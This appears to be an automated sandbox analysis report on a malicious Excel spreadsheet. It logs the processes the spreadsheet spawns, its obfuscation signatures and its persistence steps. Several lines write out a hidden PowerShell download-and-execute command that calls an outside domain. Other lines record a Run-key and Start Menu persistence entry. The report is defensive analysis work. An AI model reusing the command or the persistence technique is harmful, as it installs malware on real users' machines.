                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: x2hGv.xlsReversingLabs: Detection: 22%
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}'
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\Public\kzsuoseu.exe 'C:\Users\Public\kzsuoseu.exe'
                Source: unknownProcess created: C:\Users\Public\kzsuoseu.exe 'C:\Users\Public\kzsuoseu.exe'
                Source: unknownProcess created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe
                Source: unknownProcess created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe
                Source: unknownProcess created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\kzsuoseu.exe 'C:\Users\Public\kzsuoseu.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\kzsuoseu.exe 'C:\Users\Public\kzsuoseu.exe'
                Source: C:\Users\Public\kzsuoseu.exeProcess created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe
                Source: C:\Users\Public\kzsuoseu.exeProcess created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe
                Source: C:\Users\Public\kzsuoseu.exeProcess created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe
                Source: C:\Users\Public\kzsuoseu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                Source: Binary string: Hbpdblib.pdb source: powershell.exe, 00000016.00000002.493294610.0000022BEDB5B000.00000004.00000001.sdmp

                Data Obfuscation:

                barindex
                Suspicious powershell command line foundShow sources
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}'
                Source: C:\Users\Public\kzsuoseu.exeCode function: 26_2_015CFA10 push esp; iretd
                Source: C:\Users\Public\kzsuoseu.exeCode function: 26_2_015CFAE4 pushfd ; iretd
                Source: C:\Users\Public\kzsuoseu.exeCode function: 28_2_032FFA10 push esp; iretd
                Source: C:\Users\Public\kzsuoseu.exeCode function: 28_2_032FFAE4 pushfd ; iretd
                Source: initial sampleStatic PE information: section name: .text entropy: 7.96407261365
                Source: initial sampleStatic PE information: section name: .text entropy: 7.96407261365
                Source: kzsuoseu.exe.21.dr, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.csHigh entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
                Source: kzsuoseu.exe.21.dr, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.csHigh entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
                Source: 26.2.kzsuoseu.exe.e30000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.csHigh entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
                Source: 26.2.kzsuoseu.exe.e30000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.csHigh entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
                Source: 26.0.kzsuoseu.exe.e30000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.csHigh entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
                Source: 26.0.kzsuoseu.exe.e30000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.csHigh entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
                Source: vlc.exe.28.dr, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.csHigh entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
                Source: vlc.exe.28.dr, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.csHigh entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
                Source: 28.0.kzsuoseu.exe.f40000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.csHigh entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
                Source: 28.0.kzsuoseu.exe.f40000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.csHigh entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
                Source: 28.2.kzsuoseu.exe.f40000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.csHigh entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
                Source: 28.2.kzsuoseu.exe.f40000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.csHigh entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
                Source: 30.0.kzsuoseu.exe.ba0000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.csHigh entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
                Source: 30.0.kzsuoseu.exe.ba0000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.csHigh entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
                Source: 30.2.kzsuoseu.exe.ba0000.1.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.csHigh entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
                Source: 30.2.kzsuoseu.exe.ba0000.1.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.csHigh entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
                Source: 31.0.kzsuoseu.exe.330000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.csHigh entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
                Source: 31.0.kzsuoseu.exe.330000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.csHigh entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
                Source: 31.2.kzsuoseu.exe.330000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.csHigh entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
                Source: 31.2.kzsuoseu.exe.330000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.csHigh entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
                Source: 32.0.kzsuoseu.exe.510000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.csHigh entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
                Source: 32.0.kzsuoseu.exe.510000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.csHigh entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
                Source: 32.2.kzsuoseu.exe.510000.1.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.csHigh entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
                Source: 32.2.kzsuoseu.exe.510000.1.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.csHigh entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'

                Persistence and Installation Behavior:

                barindex
                Creates processes via WMIShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\kzsuoseu.exeJump to dropped file
                Source: C:\Users\Public\kzsuoseu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\kzsuoseu.exeJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\kzsuoseu.exeJump to dropped file
                Source: C:\Users\Public\kzsuoseu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLANJump to behavior
                Source: C:\Users\Public\kzsuoseu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJump to behavior
                Source: C:\Users\Public\kzsuoseu.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlcJump to behavior
                Source: C:\Users\Public\kzsuoseu.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlcJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
